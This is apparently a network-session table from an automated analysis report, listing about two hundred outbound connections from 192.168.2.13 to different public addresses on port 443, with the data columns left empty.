                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17715192.168.2.134178468.212.152.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17716192.168.2.1350348135.227.194.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17717192.168.2.135894089.85.183.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17718192.168.2.1352988138.37.188.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17719192.168.2.1347846146.13.172.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17720192.168.2.1346090159.31.105.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17721192.168.2.134663475.177.121.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17722192.168.2.1338378107.237.64.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17723192.168.2.1359668170.176.248.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17724192.168.2.1354614113.134.112.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17725192.168.2.1358566200.169.102.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17726192.168.2.1344680178.212.245.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17727192.168.2.1358344133.31.220.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17728192.168.2.133368457.224.223.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17729192.168.2.1339888125.54.12.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17730192.168.2.133498048.110.227.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17731192.168.2.1345392185.71.16.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17732192.168.2.133930088.254.40.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17733192.168.2.1334268188.122.146.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17734192.168.2.13458504.159.211.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17735192.168.2.136068841.32.23.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17736192.168.2.135697675.25.170.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17737192.168.2.1333168204.31.241.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17738192.168.2.1340950126.54.107.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17739192.168.2.135960044.67.60.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17740192.168.2.134984442.193.121.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17741192.168.2.134491694.92.249.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17742192.168.2.134291014.27.150.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17743192.168.2.13393722.151.58.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17744192.168.2.13408604.95.193.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17745192.168.2.1357398199.145.20.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17746192.168.2.1348706128.162.59.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17747192.168.2.134922473.154.48.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17748192.168.2.135605461.228.124.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17749192.168.2.1334862156.167.182.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17750192.168.2.1345166101.218.184.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17751192.168.2.1354450138.166.216.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17752192.168.2.1343292189.20.25.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17753192.168.2.133852224.93.145.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17754192.168.2.133329488.224.57.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17755192.168.2.1347796218.138.165.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17756192.168.2.1341026183.133.190.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17757192.168.2.13439942.91.118.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17758192.168.2.133307435.171.177.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17759192.168.2.135647234.243.210.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17760192.168.2.1357142124.88.87.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17761192.168.2.133905067.108.0.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17762192.168.2.134005244.239.48.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17763192.168.2.1347396139.147.176.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17764192.168.2.1343132195.34.20.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17765192.168.2.135049825.135.208.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17766192.168.2.1351710161.138.26.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17767192.168.2.1352230192.55.161.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17768192.168.2.1354588120.133.48.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17769192.168.2.134902484.248.159.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17770192.168.2.1342358129.116.6.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17771192.168.2.1340358206.122.142.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17772192.168.2.135883877.139.255.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17773192.168.2.135885895.162.123.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17774192.168.2.1354290120.117.145.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17775192.168.2.1356402132.91.201.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17776192.168.2.1355314151.136.179.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17777192.168.2.135511450.86.113.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17778192.168.2.1335718102.225.220.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17779192.168.2.135271045.222.59.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17780192.168.2.133698470.212.25.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17781192.168.2.133564635.214.21.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17782192.168.2.1347450128.19.30.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17783192.168.2.1336196112.17.246.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17784192.168.2.1358638173.241.156.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17785192.168.2.134416663.226.23.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17786192.168.2.133989414.53.135.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17787192.168.2.133625479.31.53.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17788192.168.2.135394494.241.80.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17789192.168.2.1333406151.236.69.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17790192.168.2.1356720121.216.24.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17791192.168.2.1336228153.17.77.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17792192.168.2.1358302119.212.35.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17793192.168.2.1339566115.222.178.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17794192.168.2.1341406121.33.219.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17795192.168.2.1355262153.166.117.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17796192.168.2.13385325.24.226.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17797192.168.2.1349644123.13.236.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17798192.168.2.133461643.214.189.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17799192.168.2.1353272118.100.103.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17800192.168.2.1357438220.137.149.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17801192.168.2.1346822108.81.101.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17802192.168.2.1354330195.158.188.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17803192.168.2.1349804100.204.150.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17804192.168.2.1341810208.250.161.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17805192.168.2.135163843.51.84.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17806192.168.2.1344714212.207.12.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17807192.168.2.1333748150.193.245.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17808192.168.2.134049660.86.172.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17809192.168.2.1351518163.213.41.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17810192.168.2.133302238.33.12.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17811192.168.2.1345442103.87.109.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17812192.168.2.135420869.214.120.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17813192.168.2.1341102196.98.121.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17814192.168.2.1359270100.51.228.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17815192.168.2.1357232202.130.75.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17816192.168.2.1353812195.62.104.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17817192.168.2.1348600110.131.34.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17818192.168.2.135855647.70.15.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17819192.168.2.1344006212.202.35.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17820192.168.2.1345866171.247.246.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17821192.168.2.1345270133.0.23.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17822192.168.2.1339610137.244.167.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17823192.168.2.1353096108.9.102.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17824192.168.2.134883635.120.146.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17825192.168.2.135852676.117.4.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17826192.168.2.135767874.172.222.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17827192.168.2.133907848.72.129.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17828192.168.2.134111896.170.177.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17829192.168.2.134705893.218.65.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17830192.168.2.1346806212.198.219.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17831192.168.2.1339098146.97.53.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17832192.168.2.1348596119.252.88.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17833192.168.2.1352172175.113.129.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17834192.168.2.1344194104.8.148.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17835192.168.2.135226434.52.41.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17836192.168.2.135132292.78.227.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17837192.168.2.1336216112.16.206.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17838192.168.2.1348164212.41.172.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17839192.168.2.1350976199.141.206.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17840192.168.2.133764068.175.149.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17841192.168.2.135513267.7.244.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17842192.168.2.1350498130.121.145.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17843192.168.2.1358988198.222.15.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17844192.168.2.1358534203.235.60.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17845192.168.2.133983031.27.191.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17846192.168.2.134112899.101.115.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17847192.168.2.1334342126.161.245.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17848192.168.2.1337234160.122.136.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17849192.168.2.1337302120.162.80.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17850192.168.2.1342984120.95.192.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17851192.168.2.1349048191.226.48.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17852192.168.2.1336656105.225.68.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17853192.168.2.1349846148.187.147.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17854192.168.2.135136272.228.87.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17855192.168.2.135421248.216.113.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17856192.168.2.1337388208.119.202.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17857192.168.2.1356672178.68.241.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17858192.168.2.1334104180.241.151.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17859192.168.2.135426842.237.45.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17860192.168.2.1341894213.77.72.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17861192.168.2.1345048176.197.55.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17862192.168.2.1345204162.100.254.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17863192.168.2.133852477.173.77.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17864192.168.2.134908437.225.235.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17865192.168.2.1339224177.74.227.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17866192.168.2.133834894.144.27.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17867192.168.2.1348044222.184.87.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17868192.168.2.135362867.220.238.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17869192.168.2.1345500165.91.63.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17870192.168.2.1342636187.122.148.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17871192.168.2.1360974128.213.191.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17872192.168.2.1349526149.46.248.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17873192.168.2.1335722139.220.38.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17874192.168.2.1357056139.182.65.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17875192.168.2.1359774134.138.127.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17876192.168.2.1340526223.199.99.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17877192.168.2.1336772107.18.7.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17878192.168.2.1353092105.239.60.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17879192.168.2.1348822222.125.0.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17880192.168.2.1333172109.42.250.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17881192.168.2.1358716210.247.172.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17882192.168.2.1359780160.145.41.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17883192.168.2.133921291.52.53.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17884192.168.2.1344498223.109.206.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17885192.168.2.1344072184.168.207.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17886192.168.2.133429848.58.148.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17887192.168.2.1354122190.42.10.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17888192.168.2.1349434113.33.111.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17889192.168.2.135885253.96.169.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17890192.168.2.1357426213.178.57.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17891192.168.2.1348484190.5.132.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17892192.168.2.1340942174.25.170.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17893192.168.2.13366049.63.109.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17894192.168.2.1357240220.237.225.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17895192.168.2.1334112166.240.12.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17896192.168.2.135524063.253.160.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17897192.168.2.135891665.221.4.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17898192.168.2.133574445.4.220.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17899192.168.2.1358946142.26.153.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17900192.168.2.134622458.26.233.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17901192.168.2.1354362112.44.69.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17902192.168.2.1343328178.132.195.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17903192.168.2.1352960158.129.38.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17904192.168.2.1356704114.215.202.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17905192.168.2.1347684190.85.151.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17906192.168.2.1350534188.75.160.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17907192.168.2.135496420.126.155.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17908192.168.2.1349538178.241.81.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17909192.168.2.1336892117.223.215.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17910192.168.2.1345618208.24.37.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17911192.168.2.135523067.181.36.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17912192.168.2.1352338131.112.50.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17913192.168.2.1357082172.112.75.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17914192.168.2.1355694196.40.74.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17915192.168.2.134013275.14.20.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17916192.168.2.134290066.178.20.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17917192.168.2.1359660126.216.93.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17918192.168.2.133870273.170.70.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17919192.168.2.1338462150.111.250.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17920192.168.2.1356840140.224.163.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17921192.168.2.135206098.112.236.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17922192.168.2.1338702151.98.169.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17923192.168.2.135183083.6.45.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17924192.168.2.1351746153.110.198.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17925192.168.2.1342302132.151.91.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17926192.168.2.1349464197.11.3.106443
                                                  TimestampBytes transferredDirectionData


